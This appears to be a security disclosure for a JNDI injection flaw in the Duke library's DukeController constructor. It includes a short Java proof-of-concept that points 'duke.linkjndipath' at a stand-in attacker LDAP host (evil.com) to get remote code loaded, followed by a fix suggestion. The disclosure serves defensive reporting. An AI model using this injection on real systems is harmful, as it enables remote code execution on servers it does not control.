There's a code injection vulnerability of no.priv.garshol.duke.server.DukeController.<constructor>(Properties)

[LetianYuan]

Affected Version
The latest version 1.2 and below.

Describe the vulnerability
There is a method no.priv.garshol.duke.server.DukeController.<constructor>(Properties). If the Properties parameter contains a property ("duke.linkjndipath", "ldap://example.com/Evil"), attackers might execute arbitrary commands through ctx.lookup("ldap://example.com/Evil"). For instance, following codes will lead to the execution of arbitrary codes from attackers:

Properties properties = new Properties();
properties.setProperty("duke.configfile", "src/main/resources/duke.xml");
properties.setProperty("duke.linkdbtype", "jndi");
properties.setProperty("duke.linkjndipath", "ldap://evil.com:12345");
properties.setProperty("duke.database", "mysql");
DukeController controller = new DukeController(properties);

To Reproduce
Build an LDAP server and provide malicious codes. Then just execute above codes would reproduce it.

Fix Suggestion
Filter LDAP, RMI and related protocols when using lookup.